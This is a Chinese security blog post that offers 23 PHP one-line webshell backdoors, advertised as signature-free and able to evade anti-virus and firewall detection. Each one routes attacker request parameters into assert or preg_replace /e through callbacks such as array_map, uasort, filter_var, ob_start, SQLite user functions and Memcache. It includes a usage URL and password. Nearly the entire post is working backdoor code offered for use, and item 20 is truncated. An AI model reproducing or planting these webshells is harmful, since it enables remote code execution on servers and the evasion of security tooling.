最新文章:

首页 Sec

分享一些无特征PHP一句话

发布时间:2015年11月25日 评论数:抢沙发 阅读数:933

    分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。(少部分一句话需要php5.4.8+、或sqlite/pdo/yaml/memcached扩展等)

    原理:https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html
    所有一句话使用方法基本都是:

    http:// target/shell.php?e=assert 密码pass

    01
    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'],);
    array_filter($arr, $e);

    02

    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'],);
    array_map($e, $arr);

    03

    $e = $_REQUEST['e'];
    $arr = array('test', $_REQUEST['pass']);
    uasort($arr, $e);

    04

    $e = $_REQUEST['e'];
    $arr = array('test' => 1, $_REQUEST['pass'] => 2);
    uksort($arr, $e);

    05

    $arr = new ArrayObject(array('test', $_REQUEST['pass']));
    $arr->uasort('assert');

    06

    $arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
    $arr->uksort('assert');

    07

    $e = $_REQUEST['e'];
    $arr = array(1);
    array_reduce($arr, $e, $_POST['pass']);

    08

    $e = $_REQUEST['e'];
    $arr = array($_POST['pass']);
    $arr2 = array(1);
    array_udiff($arr, $arr2, $e);

    09

    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'] => '|.*|e',);
    array_walk($arr, $e, '');

    10

    $e = $_REQUEST['e'];
    $arr = array($_POST['pass'] => '|.*|e',);
    array_walk_recursive($arr, $e, '');

    11

    mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');

    12

    echo preg_filter('|.*|e', $_REQUEST['pass'], '');

    13

    ob_start('assert');
    echo $_REQUEST['pass'];
    ob_end_flush();

    14

    $e = $_REQUEST['e'];
    register_shutdown_function($e, $_REQUEST['pass']);

    15

    $e = $_REQUEST['e'];
    declare(ticks=1);
    register_tick_function($e, $_REQUEST['pass']);

    16

    filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));

    17

    filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

    18

    $e = $_REQUEST['e'];
    $db = new PDO('sqlite:sqlite.db3');
    $db->sqliteCreateFunction('myfunc', $e, 1);
    $sth = $db->prepare("SELECT myfunc(:exec)");
    $sth->execute(array(':exec' => $_REQUEST['pass']));

    19

    $e = $_REQUEST['e'];
    $db = new SQLite3('sqlite.db3');
    $db->createFunction('myfunc', $e);
    $stmt = $db->prepare("SELECT myfunc(?)");
    $stmt->bindValue(1, $_REQUEST['pass'], SQLITE3_TEXT);
    $stmt->execute();

    20

    $str = urlencode($_REQUEST['pass']);
    $yaml = << 'preg_replace'));

    21

    $mem = new Memcache();
    $re = $mem->addServer('localhost', 11211, TRUE, 100, 0, -1, TRUE, create_function('$a,$b,$c,$d,$e', 'return assert($a);'));
    $mem->connect($_REQUEST['pass'], 11211, 0);

    22

    preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

    23

    mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

二维码加载中...
本文作者:Mr.linus      文章标题: 分享一些无特征PHP一句话
本文地址:http://www.90qj.com/251  本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论